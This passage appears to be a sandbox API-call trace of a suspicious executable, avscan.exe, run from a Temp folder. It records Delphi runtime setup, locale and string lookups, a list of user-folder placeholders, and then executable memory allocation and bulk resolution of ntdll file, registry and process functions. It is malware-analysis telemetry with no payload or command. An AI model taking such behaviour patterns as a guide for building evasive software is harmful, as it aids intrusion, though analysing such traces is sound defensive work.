"c:\\users\\keecfmwgj\\appdata\\local\\temp\\avscan.exe")) returned 0x2f [0109.268] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x28f863, nSize=0x105 | out: lpFilename="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\avscan.exe")) returned 0x2f [0109.268] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x28f978 | out: phkResult=0x28f978*=0x0) returned 0x2 [0109.268] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x28f978 | out: phkResult=0x28f978*=0x0) returned 0x2 [0109.268] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x28f978 | out: phkResult=0x28f978*=0x0) returned 0x2 [0109.269] lstrcpynA (in: lpString1=0x28f863, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", iMaxLength=261 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" [0109.269] GetThreadLocale () returned 0x409 [0109.269] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x28f973, cchData=5 | out: lpLCData="ENU") returned 4 [0109.269] lstrlenA (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe") returned 47 [0109.269] lstrcpynA (in: lpString1=0x28f88f, lpString2="ENU", iMaxLength=217 | out: lpString1="ENU") returned="ENU" [0109.269] LoadLibraryExA (lpLibFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.ENU", hFile=0x0, dwFlags=0x2) returned 0x0 [0109.269] lstrcpynA (in: lpString1=0x28f88f, lpString2="EN", iMaxLength=217 | out: lpString1="EN") returned="EN" [0109.269] LoadLibraryExA (lpLibFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.EN", hFile=0x0, dwFlags=0x2) returned 0x0 [0109.270] LoadStringA (in: hInstance=0x42d000, uID=0xffc2, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c [0109.448] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x1148d58 [0109.449] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x3330000 [0109.449] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x1149d58 [0109.449] VirtualAlloc (lpAddress=0x3330000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x3330000 [0109.449] LoadStringA (in: hInstance=0x42d000, uID=0xffc1, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17 [0109.452] LoadStringA (in: hInstance=0x42d000, uID=0xffdf, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0109.452] LoadStringA (in: hInstance=0x42d000, uID=0xffc0, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10 [0109.452] LoadStringA (in: hInstance=0x42d000, uID=0xffd2, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0109.452] LoadStringA (in: hInstance=0x42d000, uID=0xffdb, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10 [0109.452] LoadStringA (in: hInstance=0x42d000, uID=0xffd1, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0109.452] LoadStringA (in: hInstance=0x42d000, uID=0xffee, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0109.452] LoadStringA (in: hInstance=0x42d000, uID=0xffd5, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19 [0109.452] LoadStringA (in: hInstance=0x42d000, uID=0xffd4, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0109.452] LoadStringA (in: hInstance=0x42d000, uID=0xffe7, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe [0109.452] LoadStringA (in: hInstance=0x42d000, uID=0xffe8, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd [0109.452] LoadStringA (in: hInstance=0x42d000, uID=0xffe9, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16 [0109.452] LoadStringA (in: hInstance=0x42d000, uID=0xffe6, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10 [0109.452] LoadStringA (in: hInstance=0x42d000, uID=0xffe4, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16 [0109.452] LoadStringA (in: hInstance=0x42d000, uID=0xffe2, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18 [0109.453] LoadStringA (in: hInstance=0x42d000, uID=0xffe1, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17 [0109.453] LoadStringA (in: hInstance=0x42d000, uID=0xffe0, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f [0109.453] LoadStringA (in: hInstance=0x42d000, uID=0xffff, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0109.453] LoadStringA (in: hInstance=0x42d000, uID=0xfffe, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10 [0109.453] LoadStringA (in: hInstance=0x42d000, uID=0xfffd, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11 [0109.453] LoadStringA (in: hInstance=0x42d000, uID=0xfffc, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10 [0109.453] LoadStringA (in: hInstance=0x42d000, uID=0xfffb, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15 [0109.453] LoadStringA (in: hInstance=0x42d000, uID=0xfffa, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9 [0109.453] LoadStringA (in: hInstance=0x42d000, uID=0xfff9, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17 [0109.453] LoadStringA (in: hInstance=0x42d000, uID=0xfff8, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12 [0109.453] LoadStringA (in: hInstance=0x42d000, uID=0xfff7, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13 [0109.453] LoadStringA (in: hInstance=0x42d000, uID=0xfff6, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10 [0109.453] LoadStringA (in: hInstance=0x42d000, uID=0xfff5, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe [0109.503] LoadStringA (in: hInstance=0x42d000, uID=0xfff3, lpBuffer=0x28fa98, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd [0109.503] LoadStringA (in: hInstance=0x42d000, uID=0xffe3, lpBuffer=0x28fa98, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0109.503] GetVersionExA (in: lpVersionInformation=0x28fe30*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x28fe68, dwMinorVersion=0x656, dwBuildNumber=0x0, dwPlatformId=0x57935a, szCSDVersion="\x8f\x80W") | out: lpVersionInformation=0x28fe30*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0109.553] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0109.554] GetProcAddress (hModule=0x75a80000, lpProcName="GetDiskFreeSpaceExA") returned 0x75b148ef [0109.554] GetThreadLocale () returned 0x409 [0109.604] GetThreadLocale () returned 0x409 [0109.604] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Jan") returned 4 [0109.604] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x28fd08, cchData=256 | out: lpLCData="January") returned 8 [0109.604] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Feb") returned 4 [0109.605] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x28fd08, cchData=256 | out: lpLCData="February") returned 9 [0109.605] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Mar") returned 4 [0109.605] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x28fd08, cchData=256 | out: lpLCData="March") returned 6 [0109.605] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Apr") returned 4 [0109.605] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x28fd08, cchData=256 | out: lpLCData="April") returned 6 [0109.605] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x28fd08, cchData=256 | out: lpLCData="May") returned 4 [0109.605] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x28fd08, cchData=256 | out: lpLCData="May") returned 4 [0109.605] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Jun") returned 4 [0109.605] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x28fd08, cchData=256 | out: lpLCData="June") returned 5 [0109.605] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Jul") returned 4 [0109.605] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x28fd08, cchData=256 | out: lpLCData="July") returned 5 [0109.605] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Aug") returned 4 [0109.605] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x28fd08, cchData=256 | out: lpLCData="August") returned 7 [0109.605] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Sep") returned 4 [0109.605] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x28fd08, cchData=256 | out: lpLCData="September") returned 10 [0109.605] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Oct") returned 4 [0109.605] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x28fd08, cchData=256 | out: lpLCData="October") returned 8 [0109.605] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Nov") returned 4 [0109.605] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x28fd08, cchData=256 | out: lpLCData="November") returned 9 [0109.605] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Dec") returned 4 [0109.605] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x28fd08, cchData=256 | out: lpLCData="December") returned 9 [0109.605] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Sun") returned 4 [0109.605] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Sunday") returned 7 [0109.605] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Mon") returned 4 [0109.605] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Monday") returned 7 [0109.605] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Tue") returned 4 [0109.605] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Tuesday") returned 8 [0109.605] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Wed") returned 4 [0109.605] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Wednesday") returned 10 [0109.607] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Thu") returned 4 [0109.607] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Thursday") returned 9 [0109.607] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Fri") returned 4 [0109.607] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Friday") returned 7 [0109.607] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Sat") returned 4 [0109.607] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Saturday") returned 9 [0109.607] GetThreadLocale () returned 0x409 [0109.607] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x28fd64, cchData=256 | out: lpLCData="$") returned 2 [0109.607] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x28fd64, cchData=256 | out: lpLCData="0") returned 2 [0109.659] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x28fd64, cchData=256 | out: lpLCData="0") returned 2 [0109.659] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x28fe5c, cchData=2 | out: lpLCData=",") returned 2 [0109.659] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x28fe5c, cchData=2 | out: lpLCData=".") returned 2 [0109.659] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x28fd64, cchData=256 | out: lpLCData="2") returned 2 [0109.659] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x28fe5c, cchData=2 | out: lpLCData="/") returned 2 [0109.659] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x28fd64, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0109.659] GetThreadLocale () returned 0x409 [0109.659] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x28fd30, cchData=256 | out: lpLCData="1") returned 2 [0109.659] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x28fd64, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0109.659] GetThreadLocale () returned 0x409 [0109.659] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x28fd30, cchData=256 | out: lpLCData="1") returned 2 [0109.659] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x28fe5c, cchData=2 | out: lpLCData=":") returned 2 [0109.659] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x28fd64, cchData=256 | out: lpLCData="AM") returned 3 [0109.659] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x28fd64, cchData=256 | out: lpLCData="PM") returned 3 [0109.659] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x28fd64, cchData=256 | out: lpLCData="0") returned 2 [0109.659] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x28fd64, cchData=256 | out: lpLCData="0") returned 2 [0109.659] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x28fd64, cchData=256 | out: lpLCData="0") returned 2 [0109.659] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x28fe5c, cchData=2 | out: lpLCData=",") returned 2 [0109.659] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x775d0000 [0109.660] GetProcAddress (hModule=0x775d0000, lpProcName="VariantChangeTypeEx") returned 0x775d4c28 [0109.660] GetProcAddress (hModule=0x775d0000, lpProcName="VarNeg") returned 0x7764c802 [0109.660] GetProcAddress (hModule=0x775d0000, lpProcName="VarNot") returned 0x7764ec66 [0109.660] GetProcAddress (hModule=0x775d0000, lpProcName="VarAdd") returned 0x775f5934 [0109.660] GetProcAddress (hModule=0x775d0000, lpProcName="VarSub") returned 0x7764d332 [0109.660] GetProcAddress (hModule=0x775d0000, lpProcName="VarMul") returned 0x7764dbd4 [0109.660] GetProcAddress (hModule=0x775d0000, lpProcName="VarDiv") returned 0x7764e405 [0109.660] GetProcAddress (hModule=0x775d0000, lpProcName="VarIdiv") returned 0x7764f00a [0109.660] GetProcAddress (hModule=0x775d0000, lpProcName="VarMod") returned 0x7764f15e [0109.661] GetProcAddress (hModule=0x775d0000, lpProcName="VarAnd") returned 0x775f5a98 [0109.661] GetProcAddress (hModule=0x775d0000, lpProcName="VarOr") returned 0x7764ecfa [0109.661] GetProcAddress (hModule=0x775d0000, lpProcName="VarXor") returned 0x7764ee2e [0109.661] GetProcAddress (hModule=0x775d0000, lpProcName="VarCmp") returned 0x775eb0dc [0109.661] GetProcAddress (hModule=0x775d0000, lpProcName="VarI4FromStr") returned 0x775e6fab [0109.661] GetProcAddress (hModule=0x775d0000, lpProcName="VarR4FromStr") returned 0x775f01a0 [0109.661] GetProcAddress (hModule=0x775d0000, lpProcName="VarR8FromStr") returned 0x775e699e [0109.661] GetProcAddress (hModule=0x775d0000, lpProcName="VarDateFromStr") returned 0x775f6ba7 [0109.661] GetProcAddress (hModule=0x775d0000, lpProcName="VarCyFromStr") returned 0x77616c12 [0109.661] GetProcAddress (hModule=0x775d0000, lpProcName="VarBoolFromStr") returned 0x775edbd1 [0109.662] GetProcAddress (hModule=0x775d0000, lpProcName="VarBstrFromCy") returned 0x775f7fdc [0109.662] GetProcAddress (hModule=0x775d0000, lpProcName="VarBstrFromDate") returned 0x775e7a2a [0109.662] GetProcAddress (hModule=0x775d0000, lpProcName="VarBstrFromBool") returned 0x775f0355 [0109.880] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x76c60000 [0109.880] GetProcAddress (hModule=0x76c60000, lpProcName="CoCreateInstanceEx") returned 0x76ca9d4e [0109.880] GetProcAddress (hModule=0x76c60000, lpProcName="CoInitializeEx") returned 0x76ca09ad [0109.880] GetProcAddress (hModule=0x76c60000, lpProcName="CoAddRefServerProcess") returned 0x76cc3cf3 [0109.880] GetProcAddress (hModule=0x76c60000, lpProcName="CoReleaseServerProcess") returned 0x76cc4314 [0109.880] GetProcAddress (hModule=0x76c60000, lpProcName="CoResumeClassObjects") returned 0x76c6ea02 [0109.880] GetProcAddress (hModule=0x76c60000, lpProcName="CoSuspendClassObjects") returned 0x76ccbb02 [0110.095] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0xb4 [0110.095] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xb8 [0110.095] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xbc [0110.912] QueryPerformanceCounter (in: lpPerformanceCount=0x28fecc | out: lpPerformanceCount=0x28fecc*=3059174057954) returned 1 [0110.966] SysReAllocStringLen (in: pbstr=0x54b634*=0x0, psz="%UserProfile FOLDER%", len=0x14 | out: pbstr=0x54b634*="%UserProfile FOLDER%") returned 1 [0110.966] SysReAllocStringLen (in: pbstr=0x54b630*=0x0, psz="%SYSTEM DRIVE%", len=0xe | out: pbstr=0x54b630*="%SYSTEM DRIVE%") returned 1 [0110.966] SysReAllocStringLen (in: pbstr=0x54b62c*=0x0, psz="%Local, ApplicationData FOLDER%", len=0x1f | out: pbstr=0x54b62c*="%Local, ApplicationData FOLDER%") returned 1 [0110.966] SysReAllocStringLen (in: pbstr=0x54b628*=0x0, psz="%AllUsers, ApplicationData FOLDER%", len=0x22 | out: pbstr=0x54b628*="%AllUsers, ApplicationData FOLDER%") returned 1 [0110.966] SysReAllocStringLen (in: pbstr=0x54b624*=0x0, psz="%Temp FOLDER%", len=0xd | out: pbstr=0x54b624*="%Temp FOLDER%") returned 1 [0110.966] SysReAllocStringLen (in: pbstr=0x54b620*=0x0, psz="%ApplicationData FOLDER%", len=0x18 | out: pbstr=0x54b620*="%ApplicationData FOLDER%") returned 1 [0110.966] SysReAllocStringLen (in: pbstr=0x54b61c*=0x0, psz="%InternetCache FOLDER%", len=0x16 | out: pbstr=0x54b61c*="%InternetCache FOLDER%") returned 1 [0110.966] SysReAllocStringLen (in: pbstr=0x54b618*=0x0, psz="%Cookies FOLDER%", len=0x10 | out: pbstr=0x54b618*="%Cookies FOLDER%") returned 1 [0110.966] SysReAllocStringLen (in: pbstr=0x54b614*=0x0, psz="%History FOLDER%", len=0x10 | out: pbstr=0x54b614*="%History FOLDER%") returned 1 [0110.966] SysReAllocStringLen (in: pbstr=0x54b610*=0x0, psz="%My Pictures FOLDER%", len=0x14 | out: pbstr=0x54b610*="%My Pictures FOLDER%") returned 1 [0110.966] SysReAllocStringLen (in: pbstr=0x54b60c*=0x0, psz="%AllUsers, Documents FOLDER%", len=0x1c | out: pbstr=0x54b60c*="%AllUsers, Documents FOLDER%") returned 1 [0110.967] SysReAllocStringLen (in: pbstr=0x54b608*=0x0, psz="%Program Files, Common FOLDER%", len=0x1e | out: pbstr=0x54b608*="%Program Files, Common FOLDER%") returned 1 [0110.967] SysReAllocStringLen (in: pbstr=0x54b604*=0x0, psz="%Program Files FOLDER%", len=0x16 | out: pbstr=0x54b604*="%Program Files FOLDER%") returned 1 [0110.967] SysReAllocStringLen (in: pbstr=0x54b600*=0x0, psz="%My Documents FOLDER%", len=0x15 | out: pbstr=0x54b600*="%My Documents FOLDER%") returned 1 [0110.967] SysReAllocStringLen (in: pbstr=0x54b5fc*=0x0, psz="%WINDOWS FOLDER%", len=0x10 | out: pbstr=0x54b5fc*="%WINDOWS FOLDER%") returned 1 [0110.967] SysReAllocStringLen (in: pbstr=0x54b5f8*=0x0, psz="%SYSTEM FOLDER%", len=0xf | out: pbstr=0x54b5f8*="%SYSTEM FOLDER%") returned 1 [0110.967] SysReAllocStringLen (in: pbstr=0x54b5f4*=0x0, psz="%DEFAULT FOLDER%", len=0x10 | out: pbstr=0x54b5f4*="%DEFAULT FOLDER%") returned 1 [0111.072] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0111.072] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x310000 [0111.074] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0111.074] GetProcAddress (hModule=0x75a80000, lpProcName="GetProcAddress") returned 0x75a91222 [0111.074] GetProcAddress (hModule=0x77a60000, lpProcName="ZwClose") returned 0x77a7f9d0 [0111.074] GetProcAddress (hModule=0x77a60000, lpProcName="ZwSetInformationFile") returned 0x77a7fc28 [0111.074] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryInformationFile") returned 0x77a7fa00 [0111.075] GetProcAddress (hModule=0x77a60000, lpProcName="ZwReadFile") returned 0x77a7f8e0 [0111.075] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCreateFile") returned 0x77a800a4 [0111.075] GetProcAddress (hModule=0x77a60000, lpProcName="ZwOpenFile") returned 0x77a7fd54 [0111.075] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryAttributesFile") returned 0x77a7fe4c [0111.075] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCreateSection") returned 0x77a7ff94 [0111.075] GetProcAddress (hModule=0x77a60000, lpProcName="ZwMapViewOfSection") returned 0x77a7fc40 [0111.075] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQuerySection") returned 0x77a80040 [0111.075] GetProcAddress (hModule=0x77a60000, lpProcName="ZwUnmapViewOfSection") returned 0x77a7fc70 [0111.075] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryFullAttributesFile") returned 0x77a8132c [0111.075] GetProcAddress (hModule=0x77a60000, lpProcName="ZwWriteFile") returned 0x77a7f918 [0111.076] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryObject") returned 0x77a7f9e8 [0111.076] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryDirectoryFile") returned 0x77a7fd88 [0111.076] GetProcAddress (hModule=0x77a60000, lpProcName="ZwOpenSection") returned 0x77a7fdb8 [0111.076] GetProcAddress (hModule=0x77a60000, lpProcName="ZwDuplicateObject") returned 0x77a7fe34 [0111.076] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryVolumeInformationFile") returned 0x77a7ff7c [0111.076] GetProcAddress (hModule=0x77a60000, lpProcName="ZwDeleteFile") returned 0x77a809d4 [0111.076] GetProcAddress (hModule=0x77a60000, lpProcName="ZwLockFile") returned 0x77a80e44 [0111.076] GetProcAddress (hModule=0x77a60000, lpProcName="ZwUnlockFile") returned 0x77a81ea8 [0111.076] GetProcAddress (hModule=0x77a60000, lpProcName="ZwTerminateProcess") returned 0x77a7fca0 [0111.077] GetProcAddress (hModule=0x77a60000, lpProcName="ZwOpenKey") returned 0x77a7fa18 [0111.077] GetProcAddress (hModule=0x77a60000, lpProcName="ZwEnumerateValueKey") returned 0x77a7fa30 [0111.077] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryKey") returned 0x77a7fa80 [0111.077] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryValueKey") returned 0x77a7fa98 [0111.077] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCreateKey") returned 0x77a7fb30 [0111.077] GetProcAddress (hModule=0x77a60000, lpProcName="ZwEnumerateKey") returned 0x77a7fd3c [0111.077] GetProcAddress (hModule=0x77a60000, lpProcName="ZwSetValueKey") returned 0x77a801b4 [0111.077] GetProcAddress (hModule=0x77a60000, lpProcName="ZwDeleteKey") returned 0x77a809ec [0111.077] GetProcAddress (hModule=0x77a60000, lpProcName="ZwDeleteValueKey") returned 0x77a80a34 [0111.078] GetProcAddress (hModule=0x77a60000, lpProcName="ZwFlushKey") returned 0x77a80b70 [0111.078] GetProcAddress (hModule=0x77a60000, lpProcName="ZwLoadKey") returned 0x77a80dfc [0111.078] GetProcAddress (hModule=0x77a60000, lpProcName="ZwLoadKey2") returned 0x77a80e14 [0111.078] GetProcAddress (hModule=0x77a60000, lpProcName="ZwNotifyChangeKey") returned 0x77a80f60 [0111.078] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryMultipleValueKey") returned 0x77a8146c [0111.078] GetProcAddress (hModule=0x77a60000, lpProcName="ZwReplaceKey") returned 0x77a81738 [0111.078] GetProcAddress (hModule=0x77a60000, lpProcName="ZwRestoreKey") returned 0x77a817d0 [0111.078] GetProcAddress (hModule=0x77a60000, lpProcName="ZwSaveKey") returned 0x77a81864 [0111.078] GetProcAddress (hModule=0x77a60000, lpProcName="ZwSetInformationKey") returned 0x77a81a48 [0111.079] GetProcAddress (hModule=0x77a60000, lpProcName="ZwUnloadKey") returned 0x77a81e60 [0111.079] GetProcAddress (hModule=0x77a60000, lpProcName="ZwAccessCheck") returned 0x77a80218 [0111.079] GetProcAddress (hModule=0x77a60000, lpProcName="ZwExtendSection") returned 0x77a80b0c [0111.079] GetProcAddress (hModule=0x77a60000, lpProcName="ZwFlushBuffersFile") returned 0x77a7ffac [0111.079] GetProcAddress (hModule=0x77a60000, lpProcName="ZwFsControlFile") returned 0x77a7fde8 [0111.079] GetProcAddress (hModule=0x77a60000, lpProcName="ZwNotifyChangeDirectoryFile") returned 0x77a80f48 [0111.079] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQuerySecurityObject") returned 0x77a81518 [0111.079] GetProcAddress (hModule=0x77a60000, lpProcName="ZwSetSecurityObject") returned 0x77a81b8c [0111.080] GetProcAddress (hModule=0x77a60000, lpProcName="ZwSetVolumeInformationFile") returned 0x77a81c8c [0111.080] GetProcAddress (hModule=0x77a60000, lpProcName="ZwOpenKeyEx") returned 0x77a81008 [0111.080] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCreateProcess") returned 0x77a80804 [0111.080] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCreateProcessEx") returned 0x77a7ffdc [0111.080] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCreateUserProcess") returned 0x77a8090c [0111.080] GetProcAddress (hModule=0x77a60000, lpProcName="ZwResumeThread") returned 0x77a80058 [0111.080] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCreateThread") returned 0x77a7fff4 [0111.080] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryInformationProcess") returned 0x77a7fac8 [0111.080] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryVirtualMemory") returned 0x77a7fbc8 [0111.080] GetProcAddress (hModule=0x77a60000, lpProcName="ZwDeviceIoControlFile") returned 